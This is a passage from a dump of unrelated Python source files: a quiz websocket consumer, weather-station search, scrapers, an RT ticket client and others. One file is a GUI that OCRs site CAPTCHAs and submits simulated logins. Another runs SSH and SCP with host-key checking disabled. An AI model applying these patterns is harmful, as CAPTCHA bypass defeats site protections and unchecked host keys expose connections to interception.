print(\"is_anonymous\")\n await self.close()\n \n self.sender=0\n self.qustion_num=0\n self.room_id = self.scope['url_route']['kwargs']['pk']\n self.group_name = \"{}\".format(self.room_id)\n # Join room group\n\n\n await self.channel_layer.group_add(\n self.group_name,\n self.channel_name\n )\n\n\n async def disconnect(self, close_code):\n\n player1score=0\n player2score=0\n room=await get_room(self.room_id)\n\n if room and not room.take_prize and not room.is_random:\n \n if self.scope['user'].pk == self.player1:\n # print(\"user 1\")\n player1score=-1\n self.sender=self.player1\n\n elif self.scope['user'].pk == self.player2:\n # print(\"user 2\")\n player2score=-1\n self.sender=self.player2\n \n\n await self.channel_layer.group_send(\n self.group_name,\n {\n 'type': 'recieve_group_message',\n 'player1score':player1score,\n 'player2score':player2score,\n 'sender':self.sender,\n 'question':self.qustion_num,\n }\n )\n\n await self.channel_layer.group_discard(\n self.group_name,\n self.channel_name\n )\n \n\n\n async def receive(self, text_data=None,bytes_data = None):\n\n text_data_json = json.loads(text_data)\n\n player1score = text_data_json['player1score']\n player2score = text_data_json['player2score']\n sender = text_data_json['sender']\n question= text_data_json['question']\n \n self.qustion_num=question\n self.sender=sender\n \n \n if self.player1==0:\n room =await get_room(self.room_id)\n self.player1=room.player1_profile\n \n if self.player2==0 :\n room =await get_room(self.room_id)\n self.player2=room.player2_profile\n \n \n\n await self.channel_layer.group_send(\n self.group_name,\n {\n 'type': 'recieve_group_message',\n 'player1score':player1score,\n 'player2score':player2score,\n 'sender':sender,\n 'question':question,\n }\n )\n\n if player1score==-1 :\n \n await 
room_user_left(self.room_id,self.scope['user'].pk)\n        \n        elif player2score==-1:\n        \n            await room_user_left(self.room_id,self.scope['user'].pk)\n\n        # call_command('random_player',self.room_id)\n        \n\n\n    async def recieve_group_message(self, event):\n\n        player1score = event['player1score']\n        player2score = event['player2score']\n        sender = event['sender']\n        question = event['question']\n\n        # The payload is identical for every score combination, so forward\n        # it to the websocket exactly once instead of sending duplicates.\n        await self.send(\n            text_data=json.dumps({\n                'player1score':player1score,\n                'player2score':player2score,\n                'sender':sender,\n                'question':question,\n            }))\n","sub_path":"app/room/consumer.py","file_name":"consumer.py","file_ext":"py","file_size_in_byte":5046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"271832287","text":"\"\"\" calculates the nearest weather station to a requested location\"\"\"\nfrom datetime import datetime\nfrom typing import Union, Tuple, Optional\n\nimport numpy as np\nimport pandas as pd\nimport logging\nfrom scipy.spatial import cKDTree\n\nfrom wetterdienst.additionals.functions import (\n    check_parameters,\n    parse_enumeration_from_template,\n    cast_to_list,\n)\nfrom wetterdienst.additionals.time_handling import parse_datetime\nfrom wetterdienst.data_models.coordinates import Coordinates\nfrom wetterdienst.enumerations.column_names_enumeration import DWDMetaColumns\nfrom wetterdienst.enumerations.parameter_enumeration import Parameter\nfrom wetterdienst.enumerations.period_type_enumeration import PeriodType\nfrom wetterdienst.enumerations.time_resolution_enumeration import TimeResolution\nfrom wetterdienst.exceptions import InvalidParameterCombination\nfrom wetterdienst.parse_metadata import metadata_for_climate_observations\n\nKM_EARTH_RADIUS = 6371\n\nlogger = logging.getLogger(__name__)\n\n\ndef get_nearby_stations(\n    latitude: float,\n    longitude: float,\n    minimal_available_date: Union[datetime, str],\n    maximal_available_date: Union[datetime, str],\n    parameter: Union[Parameter, str],\n    time_resolution: Union[TimeResolution, str],\n    period_type: Union[PeriodType, str],\n    num_stations_nearby: Optional[int] = None,\n    max_distance_in_km: Optional[float] = None,\n) -> pd.DataFrame:\n    \"\"\"\n    Provides a list of weather station ids for the requested data\n    Args:\n        latitude: latitude of location to search for nearest\n        weather station\n        longitude: longitude of location to search for nearest\n        weather station\n        minimal_available_date: Start date of timespan where measurements\n        should be available\n        maximal_available_date: End date of timespan where measurements\n        should be available\n        parameter: observation measure\n        time_resolution: frequency/granularity of measurement interval\n        period_type: recent or historical files\n        num_stations_nearby: Number of stations that should be nearby\n        max_distance_in_km: alternative filtering criteria, maximum\n        distance to location in km\n\n    Returns:\n        DataFrames with valid Stations in radius per requested location\n\n    \"\"\"\n    # The two filter criteria are mutually exclusive.\n    if num_stations_nearby and max_distance_in_km:\n        raise ValueError(\"Either set 'num_stations_nearby' or 
'max_distance_in_km'.\")\n\n if num_stations_nearby == 0:\n raise ValueError(\"'num_stations_nearby' has to be at least 1.\")\n\n parameter = parse_enumeration_from_template(parameter, Parameter)\n time_resolution = parse_enumeration_from_template(time_resolution, TimeResolution)\n period_type = parse_enumeration_from_template(period_type, PeriodType)\n minimal_available_date = (\n minimal_available_date\n if isinstance(minimal_available_date, datetime)\n else parse_datetime(minimal_available_date)\n )\n maximal_available_date = (\n maximal_available_date\n if isinstance(maximal_available_date, datetime)\n else parse_datetime(maximal_available_date)\n )\n\n if not check_parameters(parameter, time_resolution, period_type):\n raise InvalidParameterCombination(\n f\"The combination of {parameter.value}, {time_resolution.value}, \"\n f\"{period_type.value} is invalid.\"\n )\n\n coords = Coordinates(np.array(latitude), np.array(longitude))\n\n metadata = metadata_for_climate_observations(\n parameter, time_resolution, period_type\n )\n\n metadata = metadata[\n (metadata[DWDMetaColumns.FROM_DATE.value] <= minimal_available_date)\n & (metadata[DWDMetaColumns.TO_DATE.value] >= maximal_available_date)\n ].reset_index(drop=True)\n\n # For distance filtering make normal query including all stations\n if max_distance_in_km:\n num_stations_nearby = metadata.shape[0]\n\n distances, indices_nearest_neighbours = _derive_nearest_neighbours(\n metadata.LAT.values, metadata.LON.values, coords, num_stations_nearby\n )\n\n # Require list of indices for consistency\n # Cast to np.array required for subset\n indices_nearest_neighbours = np.array(cast_to_list(indices_nearest_neighbours))\n distances_km = np.array(distances * KM_EARTH_RADIUS)\n\n # Filter for distance based on calculated distances\n if max_distance_in_km:\n _in_max_distance_indices = np.where(distances_km <= max_distance_in_km)[0]\n indices_nearest_neighbours = indices_nearest_neighbours[\n _in_max_distance_indices\n ]\n distances_km = distances_km[_in_max_distance_indices]\n\n metadata_location = metadata.loc[\n indices_nearest_neighbours\n if isinstance(indices_nearest_neighbours, (list, np.ndarray))\n else [indices_nearest_neighbours],\n :,\n ]\n metadata_location[\"DISTANCE_TO_LOCATION\"] = distances_km\n\n if metadata_location.empty:\n logger.warning(\n f\"No weather station was found for coordinate \"\n f\"{latitude}°N and {longitude}°E \"\n )\n\n return metadata_location\n\n\ndef _derive_nearest_neighbours(\n latitudes_stations: np.array,\n longitudes_stations: np.array,\n coordinates: Coordinates,\n num_stations_nearby: int = 1,\n) -> Tuple[Union[float, np.ndarray], np.ndarray]:\n \"\"\"\n A function that uses a k-d tree algorithm to obtain the nearest\n neighbours to coordinate pairs\n\n Args:\n latitudes_stations (np.array): latitude values of stations being compared to\n the coordinates\n longitudes_stations (np.array): longitude values of stations being compared to\n the coordinates\n coordinates (Coordinates): the coordinates for which the nearest neighbour\n is searched\n num_stations_nearby: Number of stations that should be nearby\n\n Returns:\n Tuple of distances and ranks of nearest to most distant stations\n \"\"\"\n points = np.c_[np.radians(latitudes_stations), np.radians(longitudes_stations)]\n distance_tree = cKDTree(points)\n return distance_tree.query(\n coordinates.get_coordinates_in_radians(), k=num_stations_nearby\n )\n\n\ndef stations_to_geojson(df: pd.DataFrame) -> dict:\n \"\"\"\n Convert DWD station information into 
GeoJSON format.\n\n Args:\n df: Input DataFrame containing station information.\n\n Return:\n Dictionary in GeoJSON FeatureCollection format.\n \"\"\"\n df = df.rename(columns=str.lower)\n\n features = []\n for _, station in df.iterrows():\n features.append(\n {\n \"type\": \"Feature\",\n \"properties\": {\n \"id\": station[\"station_id\"],\n \"name\": station[\"station_name\"],\n \"state\": station[\"state\"],\n \"from_date\": station[\"from_date\"].isoformat(),\n \"to_date\": station[\"to_date\"].isoformat(),\n \"has_file\": station[\"has_file\"],\n },\n \"geometry\": {\n # WGS84 is implied and coordinates represent decimal degrees ordered\n # as \"longitude, latitude [,elevation]\" with z expressed as metres\n # above mean sea level per WGS84.\n # -- http://wiki.geojson.org/RFC-001\n \"type\": \"Point\",\n \"coordinates\": [\n station[\"lon\"],\n station[\"lat\"],\n station[\"station_height\"],\n ],\n },\n }\n )\n\n return {\n \"type\": \"FeatureCollection\",\n \"features\": features,\n }\n","sub_path":"wetterdienst/additionals/geo_location.py","file_name":"geo_location.py","file_ext":"py","file_size_in_byte":7726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"50511334","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nfrom azure.cli.core.commands import CliCommandType\nfrom azext_dns._client_factory import (cf_dns_mgmt_zones)\n\n\ndef load_command_table(self, _):\n\n network_dns_zone_sdk = CliCommandType(\n operations_tmpl='azext_dns.dns.operations.zones_operations#ZonesOperations.{}',\n client_factory=cf_dns_mgmt_zones\n )\n\n with self.command_group('network dns zone', network_dns_zone_sdk) as g:\n g.custom_command('create', 'create_dns_zone', client_factory=cf_dns_mgmt_zones)\n g.generic_update_command('update', custom_func_name='update_dns_zone')\n","sub_path":"src/dns/azext_dns/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"545095765","text":"# -*- coding:utf-8 -*-\r\n#!/usr/bin/env python3\r\n\r\n\"\"\"\r\n\r\n\"\"\"\r\nfrom PyQt5 import QtCore, QtGui, QtWidgets\r\nfrom PyQt5.QtCore import QUrl, QByteArray\r\nfrom PyQt5.QtWebEngineWidgets import QWebEngineView, QWebEnginePage\r\nfrom PyQt5.QtNetwork import QNetworkCookie\r\nfrom PyQt5.QtWidgets import QGridLayout\r\n\r\nfrom minghu6.graphic.captcha.get_image import get_image\r\nfrom minghu6.graphic.captcha.recognise import tesseract\r\nfrom minghu6.graphic.captcha.url_captcha import url_captcha_dict\r\n\r\nfrom minghu6.internet.simulate_logon import url_logon_dict\r\n\r\n\r\nclass Ui_MainWindow():\r\n\r\n def setupUi(self, MainWindow):\r\n\r\n MainWindow.setObjectName(\"MainWindow\")\r\n MainWindow.resize(803, 442)\r\n self.centralwidget = QtWidgets.QWidget(MainWindow)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n\r\n #self.digit_captcha_label = QtWidgets.QLabel()\r\n #self.digit_captcha_label.setObjectName(\"digit_captcha_label\")\r\n\r\n #self.digit_captcha_lcd = QtWidgets.QLCDNumber()\r\n #self.digit_captcha_lcd.setObjectName(\"digit_captcha_lcd\")\r\n\r\n #self.digit_captcha_lcd.setFont(font)\r\n 
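# Button that triggers the simulate-logon flow; its clicked signal is wired to simulate_logon_func() in setSlot() below.\r\n        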
self.simulate_logon_btn = QtWidgets.QPushButton('simulate logon')\r\n\r\n\r\n self.raw_captcha_view = QtWidgets.QGraphicsView()\r\n self.raw_captcha_view.setObjectName(\"raw_captcha_view\")\r\n\r\n self.url_input_line = QtWidgets.QLineEdit()\r\n self.url_input_line.setObjectName(\"url_line\")\r\n\r\n self.url_input_label = QtWidgets.QLabel()\r\n self.url_input_label.setObjectName(\"url_label\")\r\n\r\n self.captcha_label = QtWidgets.QLabel()\r\n\r\n\r\n self.captcha_text = QtWidgets.QTextBrowser()\r\n\r\n\r\n font = QtGui.QFont()\r\n font.setBold(True)\r\n font.setItalic(True)\r\n font.setPixelSize(18)\r\n self.captcha_text.setFont(font)\r\n #self.other_captcha_text.append('abcde3')\r\n\r\n\r\n\r\n self.menubar = QtWidgets.QMenuBar(MainWindow)\r\n self.menubar.setObjectName(\"menubar\")\r\n\r\n self.menuMenu = QtWidgets.QMenu(self.menubar)\r\n self.menuMenu.setObjectName(\"menuMenu\")\r\n\r\n MainWindow.setMenuBar(self.menubar)\r\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\r\n self.statusbar.setObjectName(\"statusbar\")\r\n MainWindow.setStatusBar(self.statusbar)\r\n self.actionAuthor = QtWidgets.QAction(MainWindow)\r\n self.actionAuthor.setObjectName(\"actionAuthor\")\r\n self.menuMenu.addSeparator()\r\n self.menuMenu.addAction(self.actionAuthor)\r\n self.menubar.addAction(self.menuMenu.menuAction())\r\n\r\n\r\n self.retranslateUi(MainWindow)\r\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\r\n\r\n\r\n\r\n\r\n\r\n\r\n self.gridLayout = QGridLayout()\r\n\r\n self.browser = QWebEngineView()\r\n self.browser.setObjectName('browser')\r\n\r\n\r\n page = QWebEnginePage()\r\n self.browser.setPage(page)\r\n\r\n self.grid = self.gridLayout\r\n\r\n self.grid.addWidget(self.url_input_label, 0, 0)\r\n self.grid.addWidget(self.url_input_line, 1, 0, 1, 5)\r\n\r\n #self.grid.addWidget(self.url_grid, 0, 0)\r\n self.grid.addWidget(self.browser, 2, 0, 6, 1)\r\n self.grid.addWidget(self.raw_captcha_view, 2, 1, 1, 3)\r\n\r\n self.grid.addWidget(self.captcha_label, 3, 1)\r\n self.grid.addWidget(self.captcha_text, 3, 2)\r\n self.grid.addWidget(self.simulate_logon_btn, 5, 1, 3, 3)\r\n\r\n\r\n self.centralwidget.setLayout(self.gridLayout)\r\n MainWindow.setCentralWidget(self.centralwidget)\r\n\r\n self.setSlot()\r\n\r\n\r\n def setSlot(self):\r\n\r\n self.url_input_line.returnPressed.connect(self.url_input_line_func)\r\n self.simulate_logon_btn.clicked.connect(self.simulate_logon_func)\r\n def url_input_line_func(self):\r\n url = self.url_input_line.text()\r\n self.url = url\r\n with open('.url', 'w') as fr:\r\n fr.write(url)\r\n\r\n qurl = QUrl(url)\r\n\r\n\r\n #url_captcha = url_captcha_dict.get(url, url)\r\n # load url into browser frame\r\n if not hasattr(self, 'session_dict'):\r\n self.session_dict = {}\r\n #self.session_dict = {}\r\n session1 = self.session_dict.get(url, None)\r\n responseSet = url_captcha_dict[url](session=session1)\r\n\r\n url_captcha, url_session = responseSet[:2]\r\n self.params_dict = responseSet[-1]\r\n html = responseSet[2]\r\n\r\n\r\n _, imgPath = get_image(url_captcha, session=url_session)\r\n result = ''\r\n try:\r\n\r\n result = tesseract(imgPath, limit_config='letters_digits')\r\n #result = tesseract(url_captcha)\r\n except Exception as ex:\r\n print(ex)\r\n\r\n finally:\r\n self.result = result\r\n\r\n # update url:session\r\n self.session_dict[url] = url_session\r\n cookies1 = url_session.cookies.get_dict()\r\n #cookies1 = responseSet[2]\r\n\r\n\r\n\r\n scene = QtWidgets.QGraphicsScene()\r\n image=QtGui.QPixmap(imgPath)\r\n scene.addPixmap(image)\r\n 
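# Show the freshly downloaded CAPTCHA image in the QGraphicsView, then the OCR guess in the text box below it.\r\n        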
self.raw_captcha_view.setScene(scene)\r\n\r\n self.captcha_text.clear() #\r\n self.captcha_text.setText(result)\r\n\r\n cookieStore = self.browser.page().profile().cookieStore()\r\n #cookieStore.deleteAllCookies()\r\n\r\n cookies2=QNetworkCookie()\r\n for name, value in cookies1.items():\r\n #print(name, value)\r\n cookies2.setName(name.encode())\r\n cookies2.setValue(value.encode())\r\n cookies2.setDomain(url)\r\n cookies2.setPath(url)\r\n\r\n cookieStore.setCookie(cookies2, qurl)\r\n\r\n\r\n #print(cookieStore.loadAllCookies())\r\n\r\n\r\n #self.browser.load(qurl)\r\n self.browser.setHtml(html, qurl)\r\n\r\n\r\n def simulate_logon_func(self):\r\n from minghu6.graphic.captcha.url_captcha import CAPTCHA_ID\r\n self.params_dict[CAPTCHA_ID] = self.result\r\n\r\n html = url_logon_dict[self.url](self.session_dict[self.url],\r\n **self.params_dict)\r\n\r\n self.browser.setHtml(html, QUrl(self.url))\r\n self.session_dict[self.url] = None\r\n\r\n def retranslateUi(self, MainWindow):\r\n _translate = QtCore.QCoreApplication.translate\r\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"MainWindow\"))\r\n #self.digit_captcha_label.setText(_translate(\"MainWindow\", \"digit captcha\"))\r\n self.url_input_label.setText(_translate(\"MainWindow\", \"Url\"))\r\n self.captcha_label.setText(_translate(\"MainWindow\", \"catcha\"))\r\n self.menuMenu.setTitle(_translate(\"MainWindow\", \"Author\"))\r\n self.actionAuthor.setText(_translate(\"MainWindow\", \"庄&&刘&&冯\"))\r\n\r\n\r\ndef main():\r\n import sys\r\n app = QtWidgets.QApplication(sys.argv)\r\n MainWindow = QtWidgets.QMainWindow()\r\n ui = Ui_MainWindow()\r\n ui.setupUi(MainWindow)\r\n if len(sys.argv) > 1 and sys.argv[1]!='':\r\n ui.url = sys.argv[1]\r\n ui.url_input_line.setText(ui.url)\r\n ui.url_input_line_func()\r\n\r\n MainWindow.show()\r\n\r\n app.exec_()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","sub_path":"captcha_recognise_gui_controller.py","file_name":"captcha_recognise_gui_controller.py","file_ext":"py","file_size_in_byte":7241,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"530541543","text":"\"\"\"\nMake various theory plots\n\"\"\"\nfrom matplotlib import rc\nrc('font',**{'family':'sans-serif','sans-serif':['Helvetica']})\nrc('text', usetex=True)\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\n\n# 0 os or 1 ss\ntype = 0\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nif type ==0 : \n filenames = [\"data/z_peak_2charge_os.dat\",\"data/z_peak_3charge_os.dat\"]\nelse :\n filenames = [\"data/z_peak_2charge_ss.dat\",\"data/z_peak_3charge_ss.dat\"]\ncolours = [\"red\",\"blue\"]\nmarkers = [\"o\",\"x\"]\nlabels = [\"GSF track charge\",\"Unanimous charge\"]\n\nplots = []\n\nfor label,marker,colour,filename in zip(labels,markers,colours,filenames):\n file = open(filename,\"r\")\n x = []\n y = []\n for line in file:\n data = line.split(\",\")\n if data != [] : \n x.append(round(float(data[0])-0.5)+0.5) # round to nearest 0.5\n y.append(round(float(data[1])))\n yerr = np.sqrt(y)\n l = ax.errorbar(x, y, xerr=0.5, yerr=yerr, color=colour, fmt=marker, ms=5., label=label)\n plots.append(l)\n\nax.legend( loc='upper left', numpoints = 1 )\n\nif type ==0 : \n ax.set_xlabel(r'$m_{e^{\\pm}e^{\\mp}}~(GeV)$')\nelse:\n 
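# non-zero type plots the same-sign (ss) selection\n    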
ax.set_xlabel(r'$m_{e^{\\pm}e^{\\pm}}~(GeV)$')\nax.set_ylabel(r'Events/GeV')\nax.set_ylim(0)\nax.set_xlim(60,120)\n#ax.grid(True)\n\nplt.show()\n\n","sub_path":"plot-z-peaks.py","file_name":"plot-z-peaks.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"378651585","text":"import json\nimport requests\nimport datetime\nfrom mailPackage.mailShoot import *\n\n\nsFile = open('/Users/louispierre.gavaud/PyCharmProjects/ticketeo/JSONtest/reqJSON2.json', 'r',encoding='utf-8').read()\n\njsonData=json.loads(sFile)\n\nurl=\"https://www.oui.sncf/proposition/rest/search-travels/outward\"\n\nreq=requests.post(url,json=jsonData)\nresults=json.loads(req.content.decode(\"utf-8\"))\n\ndTravels=[]\nif 'results' in results.keys():\n for travel in results['results']:\n dTravel={'pricing':{}}\n for tarif, dataTarif in travel['priceProposals'].items():\n dTravel[\"pricing\"][tarif]=dataTarif['amount']\n try:\n dTravel[\"departureDateTime\"] = datetime.datetime.strptime(travel['departureDate'], \"%Y-%m-%dT%H:%M:%S\")\n hoursDuration,minsDuration=divmod(travel['duration'] / 3600 / 1000 * 60, 60)\n dTravel[\"Time\"]=int(hoursDuration).__str__()+\":\"+int(minsDuration).__str__()\n except:\n print(\"no duration available\")\n\n dTravels.append(dTravel)\n\n","sub_path":"initialTest/testPOST.py","file_name":"testPOST.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"612561507","text":"'''\nlist = ['cóc', 'nho', 'xoài', 'ổi']\n\n# append thêm vào cuối\nlist.append('mận')\nprint(list)\n\n#\nlist.insert(0,'dưa hấu')\nprint(list)\n'''\n\n\n# bài 1\nlist = [1,2,3,4,5,6,7,8,9,10]\nprint(list)\nso_chan = []\nso_le = []\nn = len(list)\n\nprint('------------- Bài 1-----------------------')\nfor i in range(0,n):\n if(list[i] % 2 == 0):\n so_chan.append(list[i])\n else:\n so_le.append(list[i])\n\nfor i in range(len(so_chan)):\n print('list so chan :',so_chan[i])\nprint('------------------------------------')\nfor i in range(len(so_le)):\n print('list so le :',so_le[i])\n\n\n\n# list.pop() pop xóa phần từ cuối cùng\nprint('------------------------------------')\nchars = ['a', 'b', 'c']\nnumbers = [1,2,3]\nfor char, number in zip(chars, numbers):\n print(char, number)\n\n# Bài 2 | xóa phần từ khỏi list |\nprint('---------------Bài 2---------------------')\nstrings = input('Nhập vào chuỗi :')\nstring = strings.split(',')\nstring.sort()\nprint([i for i in string])\n\n","sub_path":"list_tuple.py","file_name":"list_tuple.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"555429478","text":"from django.shortcuts import render\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\n\n# Create your views here.\ndef get_soup(url):\n headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X x.y; rv:10.0) Gecko/20100101 Firefox/10.0'}\n response = requests.get(url, headers=headers).text\n soup = BeautifulSoup(response, 'html.parser')\n souptext = soup.get_text()\n return souptext\n\ndef extract_swellnet_data(souptext):\n swell_data = []\n swell_data.append(re.findall(r'Surf: \\w+ \\d*-*\\d\\w+ \\w+', souptext))\n swell_data.append(re.findall(r'Winds: \\w+ \\w+', souptext))\n swell_data.append(re.findall(r'Weather: \\w+', souptext))\n swell_data.append(re.findall(r'Rating: \\d/\\d+', souptext))\n swell_data.append(re.findall(r'Updated: 
\\d+-\\d+-\\d+ \\d+:\\d+:\\d+', souptext))\n return swell_data\n\ndef extract_magicseaweed_data(souptext):\n swell_data = []\n raw_swell_data = re.findall(r'Current Conditions\\s+\\S+\\s+\\d\\w+ \\w+, .+', souptext)\n swell_data.append(re.findall(r'\\d*-*\\dft', raw_swell_data[0]))\n swell_data.append(re.findall(r'\\d\\w+ \\w+, \\w+/?\\w+?', raw_swell_data[0]))\n return swell_data\n\ndef extract_wind(souptext):\n wind = re.findall(r'Now\\s+\\d+.\\d+km/h\\s+[a-zA-Z]+', souptext)\n wind_data = re.findall(r'\\d+.\\d+km/h\\s+[a-zA-Z]+', wind[0])\n return wind_data\n\nmornington_report_swellnet = extract_swellnet_data(get_soup('http://www.swellnet.com/reports/australia/victoria/mornington-peninsula'))\nmornington_report_magicseaweed = extract_magicseaweed_data(get_soup('http://magicseaweed.com/Gunnamatta-Surf-Report/535/'))\nmornington_report_wind = extract_wind(get_soup('http://wind.willyweather.com.au/vic/mornington-peninsula/mornington.html'))\nphillip_report_swellnet = extract_swellnet_data(get_soup('http://www.swellnet.com/reports/australia/victoria/phillip-island'))\nphillip_report_magicseaweed = extract_magicseaweed_data(get_soup('http://magicseaweed.com/Phillip-Island-Surf-Report/536/'))\nphillip_report_wind = extract_wind(get_soup('http://wind.willyweather.com.au/vic/gippsland/phillip-island.html'))\ntorquay_report_swellnet = extract_swellnet_data(get_soup('http://www.swellnet.com/reports/australia/victoria/torquay'))\ntorquay_report_magicseaweed = extract_magicseaweed_data(get_soup('http://magicseaweed.com/Torquay-Surf-Report/525/'))\ntorquay_report_wind = extract_wind(get_soup('http://wind.willyweather.com.au/vic/barwon/torquay.html'))\n\ndef show_forecast(request):\n return render(request, 'forecast/forecast_detail.html',{'mp_sn':mornington_report_swellnet,\n 'mp_ms':mornington_report_magicseaweed,\n 'mp_ww':mornington_report_wind,\n 'pi_sn':phillip_report_swellnet,\n 'pi_ms':phillip_report_magicseaweed,\n 'pi_ww':phillip_report_wind,\n 't_sn':torquay_report_swellnet,\n 't_ms':torquay_report_magicseaweed,\n 't_ww':torquay_report_wind})\n","sub_path":"forecast/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"5921772","text":"#\n# Copyright (C) 2014 eNovance SAS \n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom subprocess import Popen, PIPE\nfrom pwd import getpwnam\nfrom grp import getgrnam\nimport os\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\ndef chown(path, user, group):\n    # The uid comes from the user name and the gid from the group name.\n    uid = getpwnam(user).pw_uid\n    gid = getgrnam(group).gr_gid\n    os.chown(path, uid, gid)\n\n\nclass RemoteUser(object):\n    def __init__(self, user, host, sshkey_path=None):\n        self.opt = ['-o', 'LogLevel=ERROR', '-o', 'StrictHostKeyChecking=no',\n                    '-o', 'UserKnownHostsFile=/dev/null']\n        if sshkey_path:\n            self.opt = self.opt + ['-i', sshkey_path]\n        self.host = '%s@%s' % (user, host)\n\n    def _exe(self, cmd):\n        logger.debug(cmd)\n        p = Popen(cmd, stdout=PIPE, stderr=PIPE)\n        stdout, stderr = p.communicate()\n        logger.debug(\"Stdout:\\n%s\\n\\nStderr:\\n%s\\n\" % (stdout, stderr))\n        p.wait()\n        return p\n\n    def _ssh(self, cmd):\n        cmd = ['ssh'] + self.opt + [self.host] + cmd.split()\n        return self._exe(cmd)\n\n    def _scpFromRemote(self, src, dest):\n        src = '%s:%s' % (self.host, src)\n        cmd = ['scp'] + self.opt + [src, dest]\n        return self._exe(cmd)\n\n    def _scpToRemote(self, src, dest):\n        dest = '%s:%s' % (self.host, dest)\n        cmd = ['scp'] + self.opt + [src, dest]\n        return self._exe(cmd)\n","sub_path":"managesf/controllers/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"224610741","text":"\"\"\"A super minimal RT search client and parser for PSU Account reset requests\"\"\"\n\nimport logging\nimport requests\n\n\ndef get(query, credentials, url):\n    \"\"\"Query RT via the API.\n    query: the RTQL query\n    credentials: a user, pass dict\n    url: base RT url\"\"\"\n    url = \"{}/search/ticket\".format(url)\n    query_string = {'query': query, 'orderby': '-Created', 'format': 's'}\n    response = requests.post(url, data=credentials, params=query_string)\n    if response.ok:\n        return parse_search(response.text)\n    else:\n        raise Exception(\"RT: Search Failed\")\n\n\ndef parse_search(response):\n    \"\"\"Parse RT search results for account reset requests.\n    response: an RT API response\"\"\"\n    message = split_response(response)\n    for req in message:\n        # the ticket id is the first chunk before ': '\n        ticket = req.split(': ')[0]\n        # the account is the last word in req\n        uid = req.split(' ')[-1]\n        logging.debug('RT: Yielding ticket=%s and user=%s', ticket, uid)\n        yield (ticket, uid)\n\n\ndef split_response(rt_response):\n    \"\"\"RT sends its own 'status' in addition to content.\n    This function returns the message and raises an exception on failure\"\"\"\n    response = rt_response.split('\\n')\n    # This is the RT request status, not HTTP status per se\n    if '200 Ok' in response[0]:\n        # we skip the first and last lines in response as they're ''\n        message = response[2:-1] # it may be possible to do [2:-2] here\n        logging.info(\"RT: response='%s'\", message)\n        return message\n    else:\n        raise Exception(\"RT: response indicates failure...\")\n\n\ndef comment(ticket, text, credentials, url):\n    \"\"\"Post a comment to a ticket at the url\n    ticket: ticket id\n    comment: comment text\n    credentials: a user, pass dict\n    url: base RT url\"\"\"\n    url = \"{0}/ticket/{1}/comment\".format(url, ticket)\n    content = \"id: {0}\\nAction: comment\\nText: {1}\".format(ticket, text)\n    post_data = credentials\n    post_data['content'] = content\n    response = requests.post(url, data=post_data)\n    message = split_response(response.text)\n    if 'Message 
recorded' in message[0]:\n        return True\n    else:\n        return False\n\n\ndef edit(ticket, values, credentials, url):\n    \"\"\"Edit a ticket\n    ticket: ticket id\n    values: a dict of ticket keys to update with corresponding values\n    credentials: a user, pass dict\n    url: base RT url\"\"\"\n    url = \"{0}/ticket/{1}/edit\".format(url, ticket)\n    post_data = credentials\n    edits = list()\n    for key in values.keys():  # dict.iterkeys() is Python 2 only\n        edits.append(\"{0}: {1}\".format(key, values[key]))\n    post_data['content'] = \"\\n\".join(edits)\n    response = requests.post(url, data=post_data)\n    message = split_response(response.text)\n    if 'updated' in message[0]:\n        return True\n    else:\n        return False\n\n\ndef move(ticket, queue, credentials, url, unown=True):\n    \"\"\"Move a ticket\n    ticket: ticket id\n    queue: the new queue for the ticket\n    credentials: a user, pass dict\n    url: base RT url\"\"\"\n    values = {\"Queue\": queue}\n    if unown:\n        values['Owner'] = \"Nobody\"\n    return edit(ticket, values, credentials, url)\n","sub_path":"rt.py","file_name":"rt.py","file_ext":"py","file_size_in_byte":3194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"45111069","text":"\nfrom Task1 import task_1\nfrom Task2 import task_2,task_2_1,task_2_2\nfrom Task3 import task_3\nimport sys\n\n\ndef main(argv):\n    if argv == '1':\n        print('doing task 1.')\n        history_1 = task_1()\n    \n    elif argv == '2':\n        print('doing task 2.')\n        history_2 = task_2()\n    \n    elif argv == '2_1':\n        print('doing task 2_1.')\n        history_2_1 = 